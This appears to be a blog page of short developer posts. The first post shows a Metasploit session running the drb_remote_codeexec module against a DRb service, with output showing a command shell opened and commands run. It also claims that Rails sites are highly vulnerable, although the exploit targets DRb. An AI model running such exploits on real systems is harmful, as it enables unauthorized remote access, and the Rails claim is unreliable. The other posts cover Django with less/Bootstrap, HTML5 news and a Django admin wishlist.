
Ruby on Rails remote code execution exploit

| by jpic | security rails ruby

Ruby on Rails websites are highly vulnerable.

Exploiting a Rails site looks like this (a Metasploit session using the drb_remote_codeexec module against the DRb service at druby://localhost:45074):

    $ msfconsole
    msf> use exploit/linux/misc/drb_remote_codeexec
    msf  exploit(drb_remote_codeexec) > set URI druby://localhost:45074
    msf  exploit(drb_remote_codeexec) > exploit
    [*] Started reverse double handler
    [*] trying to exploit instance_eval
    < snip >
    [*] Matching...
    [*] B is input...
    [*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53299) at 2013-01-09 13:06:39 -0600
    id
    uid=1001(www) gid=1001(www) groups=1001(www)

Bootstrap, lesscss and Django

| by jpic | django

This article demonstrates how to keep a project-specific fork of twitter-bootstrap, so that you can change variables.less and other files. In development, the lesscss files are compiled in the browser by the less library in debug mode. In production, compilation relies on django-compressor.

In site_base.html:

    {% load compress static %}
    {% if debug %}
        {# Development: less.js compiles the .less files in the browser. #}
        {# type="text/less" is what less.js (and, below, the compressor) key on. #}
        <link href="{{ STATIC_URL }}bootstrap/less/bootstrap.less" charset="utf-8" type="text/less" rel="stylesheet">
        <link href="{{ STATIC_URL }}bootstrap/less/responsive.less" type="text/less" rel="stylesheet">
        <script type="text/javascript">less = {}; less.env = 'development';</script>
        <script type="text/javascript" src="{{ STATIC_URL }}less.js"></script>
    {% else %}
        {# Production: django-compressor precompiles the .less files and bundles the CSS. #}
        {% compress css %}
        <link href="{{ STATIC_URL }}bootstrap/less/bootstrap.less" charset="utf-8" type="text/less" rel="stylesheet">
        <link href="{{ STATIC_URL }}bootstrap/less/responsive.less" type="text/less" rel="stylesheet">
        <link rel="stylesheet" type="text/css" href="{% static 'autocomplete_light/style.css' %}" />
        {% endcompress %}
    {% endif %}

In settings.py:


HTML5 specifications finalized

| by jpic | w3c

W3C announced that it has:

published the complete definition of the HTML5 and Canvas 2D specifications. Though not yet W3C standards, these specifications are now feature complete, meaning businesses and developers have a stable target for implementation and planning. “As of today, businesses know what they can rely on for HTML5 in the coming years, and what their customers will demand,” said Jeff Jaffe, W3C CEO.

Django admin probably going Bootstrap, maybe completely rewritten?

| by jpic | django

It seems that the Django admin revamp discussions have started again.

Last year, I sent a letter to Santa asking for 12 Transformers with super laser powers. I waited nicely and then received a little Playmobil.

So, here’s my letter to Santa this year:

  • admin CSS must be in lesscss too, i.e. you could override variables.less,
  • widgets that are usable outside the admin should not be in django.contrib.admin, i.e. the bootstrap-calendar widget should be usable outside the admin too,
  • ChangeList should be decoupled, and even refactored into 2 separate modules: one for table display like django-tables2 and one for queryset filtering,
  • for models with lots of fields, tabs are a must in the form,
  • views and URLs should be “normal”, with a fixed name and arguments instead of name generation,
  • detail view and “read” permission support,
  • per-object and per-field CRUD permissions,
